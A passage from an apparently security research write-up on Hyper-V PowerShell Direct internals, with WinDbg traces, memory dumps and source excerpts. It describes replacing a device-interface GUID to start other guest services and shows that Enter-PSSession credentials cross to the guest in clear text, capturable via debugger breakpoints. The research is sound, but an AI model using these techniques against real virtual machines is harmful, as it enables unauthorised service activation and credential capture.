<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 0 Type 00000032 Flags 00001040</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SecurityDescriptor ffffb90d7d06a630 DevExt ffffc9094ce89c60 DevObjExt ffffc9094ca24780 DevNode ffffc9094cda7c50 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0000000000) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00000180) FILE_AUTOGENERATED_DEVICE_NAME, FILE_DEVICE_SECURE_OPEN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AttachedDevice (Upper) ffffc9094ceb4970 \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">InterfaceClassGuid</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffb90d7ed57eb0)) : {999E53D4-3D5C-4C3E-8779-BED06EC056E1} [Type: _GUID]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _UNICODE_STRING @r8 - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ReferenceString</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_UNICODE_STRING *)0xffffb90d7ed57ec0)) : "{999e53d4-3d5c-4c3e-8779-bed06ec056e1}-{00000000-0000-0000-0000-000000000000}-0000" [Type: _UNICODE_STRING]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When Enter-PSSession is executed in the root OS, ws2_32!connect is called, and then winhvr!WinHvPostMessage transfers the message to the guest OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc @rdx – just before the vmcall (part of the message body)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36000 00000001 00000000 00000001 000000c4 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36010 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4 4c3e3d5c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .........S..\=>L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36020 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d0be7987 e156c06e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further, in the guest OS, as we saw, nt!IoRegisterDeviceInterface and nt!PnpNotifyDeviceClassChange are executed, and then the start trigger of the vmicvmsession service fires. But the transferred GUID can be replaced with any other one, which will provoke the start of other services that have a similar trigger. Currently such services are:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">All Hyper-V guest services</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bluetooth Support Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Camera Frame Server</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Human Interface Device Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Geolocation Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft Passport</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Portable Device Enumerator Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Monitoring Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Storage Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Touch Keyboard and Handwriting (probably)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From a technical point of view, we simply emulate the connection of a certain device to the system. The real devices are not present, so some services do not work in such conditions and display the following message after start:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="98" src="https://lh3.googleusercontent.com/3i63AZ_owCfuEeYD71zeGQ1bNLvKra0YAau3WfWVw7bkt0gz3bpqASgJ9sVZHbRITX2Lu4czegj6BlrvCPW4q2hfq00K4kv7bQF06YDiCX_81J72eT7VGl-yoKA-BKS0nLN6PK5dVKbaMHrg9A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="229" /></span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On a Shielded VM (checked in Admin-Trusted mode) the effect is similar, however the Hyper-V PowerShell Direct service will not be started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is interesting that the value of the -Credential parameter of Enter-PSSession, which is used to start powershell.exe in the guest OS, is transferred as clear text.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (emptyPassword)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetBytes(</span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"EMPTYPW"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> responseString = </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetString(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetBytes(</span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"NONEMPTYPW"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Send(password);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HyperVSocket.Receive(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> responseString = </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.ASCII.GetString(response);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the root OS: bp ws2_32!recv in the powershell process context. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="202" src="https://lh4.googleusercontent.com/wjSeY5RJm4WgDUBQ7yMVuNOf32MSr2r3yZgzFYu5DBywN-6Kz4LGLwR24BDdF0L2kdVAGKAOs9KzyV9l8rvC9qXlL8CpjN504iiSM7g35QRMK5oRHUWq7HjQnXn_IWeq_7m1gUYTaoVJO-H2Fg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="352" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the guest OS: bp sspicli!LogonUserExExW</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="250" src="https://lh3.googleusercontent.com/bIAQFnrVICbu6LMFr3L0KQ-_7jVv9Bc38CC5LtSh54rSdZD7HFDnMbYkanX9Y3tPTv8WOCWwouwPuFltZJ44MpQsCpYGC-SXD2C2aoEfcRexgNCo3Dt16RnXABO6AoCTvIiPMHXhG2LFeZ4GAw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="371" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Breakpoints on </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">are set in the guest and root OS to view the XML messages. In RAW format they look as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="215" src="https://lh5.googleusercontent.com/IsiJgROIQY7yRIkTAvz7Ietgdtk9HhOJIJP_dARTQjr9OIE_KjB1KDaByne0E9ZYvolSs-3jLp7O9GDWp2gZZ8a-aTp6BuUm7MCBhlGutFxFaQNCRJc0G4TM_wHEb6WMfGOTugPS25gRs8avjg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="376" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you load the WinDbg extension for .NET debugging (.cordll -ve -u -l), you can see the stack of powershell.exe:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="149" src="https://lh3.googleusercontent.com/5-w4O3bbD3CWu_-D64Xr5vwDepHowpp0UyWNx3DUEmQxlRviezBeMqyqqh9WBdOUg0Dt4fplJGBd6XoRpjOtrawfi3O6OZHSMCwQR4Z6vYHs0WGQM0F-1zCH_EeIkWz1dXhV3SyiWh9wMgWyYQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="625" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we see, sending is done by the SendOneItem function from the OutOfProcessTransportManager.cs module.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="146" src="https://lh5.googleusercontent.com/vshvwfNdGpzCgMiMUI_F5jDNxHYWmpVT3DmpTSndaBlL-KescPZKvzXDtb3uylbaTSUPrzjSzOYWVfiE7CvJM1hFQDhntmO9vq9jhZAXngIr2RVVguvpQl4dFXDRsCc2jsvB8CsdVw8zI03tNQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="539" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Command parameter (or the code passed in the ScriptBlock cmdlet option) is encoded by the CreateDataPacket function from the same OutOfProcessTransportManager.cs module:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">internal</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">static</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CreateDataPacket(</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">byte</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] data, </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DataPriorityType</span><span 
style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> streamType, </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> psGuid)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result = </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Format(</span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CultureInfo</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.InvariantCulture,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"<{0} {1}='{2}' {3}='{4}'>{5}</{0}>"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_DATA_TAG, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Data</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PS_OUT_OF_PROC_STREAM_ATTRIBUTE, - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stream</span></div>
